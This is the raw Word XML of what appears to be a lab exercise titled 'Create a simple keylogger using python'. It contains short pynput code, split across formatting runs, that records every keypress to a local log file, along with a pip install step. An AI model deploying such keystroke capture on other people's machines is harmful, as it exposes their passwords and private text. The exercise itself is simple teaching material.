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32BD" w14:textId="77777777" w:rsidR="004E5A19" w:rsidRPr="00C935DB" w:rsidRDefault="004E5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5DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim: - Create a simple keylogger using python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26766EF8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E5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import Key, Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB461D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import logging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B796E5B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E5A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5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no name it gets into an empty string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCF32B5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log_dir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 xml:space="preserve"> = "" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D6AE6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># This is a basic logging function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C347A2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A19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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(filename=(log_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+"key_log.txt"), level=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, format='%(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)s:%(message)s:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5AB202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# This is from the library </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CDC08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(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3D4C1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logging.info(str(key)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77067F29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# This says, listener is on </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA48A24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>with Listener(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on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30399301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A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004E5A19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4479893" w14:textId="77777777" w:rsidR="004E5A19" w:rsidRPr="004E5A19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To import the module type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EB2D2" w14:textId="4AD1E6EE" w:rsidR="00F15845" w:rsidRDefault="004E5A19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“Pip3 install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E5A19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71951691" w14:textId="4883582C" w:rsidR="00C935DB" w:rsidRPr="004E5A19" w:rsidRDefault="00C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A7A9B" wp14:editId="0961DF66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DB" w:rsidRPr="004E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19"/>
    <w:rsid w:val="004E5A19"/>
    <w:rsid w:val="00851B1D"/>
    <w:rsid w:val="0086707E"/>
    <w:rsid w:val="00A61717"/>
    <w:rsid w:val="00C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DC88"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{10A6A85F-0621-4C50-9429-C90B18AC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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-28T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-28T06:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>